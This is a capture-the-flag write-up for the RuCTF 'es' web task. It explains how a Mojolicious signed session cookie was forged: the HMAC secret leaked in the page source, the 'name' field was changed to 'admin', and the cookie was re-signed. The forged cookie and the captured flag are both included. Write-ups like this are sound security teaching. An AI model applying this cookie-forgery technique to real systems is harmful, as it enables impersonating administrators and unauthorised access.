Skip to content Skip to navigation

es (web 200)

Category: 

There is service raised at http://w2.quals.ructf.org/.

There is the authorization form and another form with strange functional on page. Also there is registration link.

At first we registered a new user with 1 / 1 as login / password. We saw that server set cookie:

Cookie: mojolicious=eyJuYW1lIjoiMSIsImV4cGlyZXMiOjEzOTUwNjI3OTh9--b844d3ef12af172ffebe4271f93d0548b92f637d

First part before "--" is base64-encoded user session information:

'eyJuYW1lIjoiMSIsImV4cGlyZXMiOjEzOTUwNjI3OTh9' == base64('{"name":"1","expires":1395062798}')

Second part after "--" is hash_hmac with sha1 of first part with a secret. We found secret in page source code:

<!-- secret: ructf -->

So we assumed that we need got admin's cookie. We replaced our nickname to 'admin' and generated new cookie with help of http://www.freeformatter.com/hmac-generator.html:

part1 = base64('{"name":"admin","expires":1395062798}')
part2 = hash_hmac('sha1', part1, 'ructf')

Result:

part1 + '--' + part2 ==
'eyJuYW1lIjoiYWRtaW4iLCJleHBpcmVzIjoxMzk1MDYyNzk4fQ==--f0b9d2795f0e8de1abafede4ea2aae54282e09a9'

So we logged in with new admin cookie and saw a message 'Hi, admin!'. Then we went to http://w2.quals.ructf.org/list and got flag 054ad7a734437d6853383ad919526dc5 by following http://w2.quals.ructf.org/very/super/secret/flag link.